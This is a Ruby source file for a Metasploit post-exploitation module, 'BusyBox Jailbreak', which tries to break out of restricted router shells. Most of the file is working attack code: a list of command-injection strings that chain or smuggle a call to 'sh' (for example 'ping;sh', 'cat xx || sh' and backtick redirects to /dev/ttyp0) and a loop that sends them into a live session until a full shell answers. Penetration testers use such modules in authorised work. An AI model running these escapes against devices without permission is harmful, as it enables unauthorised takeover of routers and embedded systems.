## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Post METHODS = [ 'cat xx || sh', 'ping || sh', 'echo `sh >> /dev/ttyp0`', 'ping `sh >> /dev/ttyp0`', 'cat `sh >> /dev/ttyp0`', 'cat xx;sh', 'echo xx;sh', 'ping;sh', 'cat xx | sh', 'ping | sh', 'cat ($sh)', 'cat xx && sh', 'echo xx && sh', 'ping && sh' ] def initialize super( 'Name' => 'BusyBox Jailbreak ', 'Description' => %q{ This module will send a set of commands to a open session that is connected to a BusyBox limited shell (i.e. a router limited shell). It will try different known tricks to jailbreak the limited shell and get a full BusyBox shell. }, 'Author' => 'Javier Vicente Vallejo', 'License' => MSF_LICENSE, 'Platform' => ['linux'], 'SessionTypes' => ['shell'] ) end def run res = false METHODS.each do |m| res = try_method(m) break if res end print_error('Unable to jailbreak device shell') unless res end def try_method(command) vprint_status("jailbreak sent: #{command}") session.shell_write("#{command}\n") (1..10).each do resp = session.shell_read vprint_status("jailbreak received: #{resp}") unless resp.nil? || resp.empty? if resp.downcase.include?('busybox') && resp.downcase.include?('built-in shell') print_good("Jailbreak accomplished with #{command}") return true end end false end end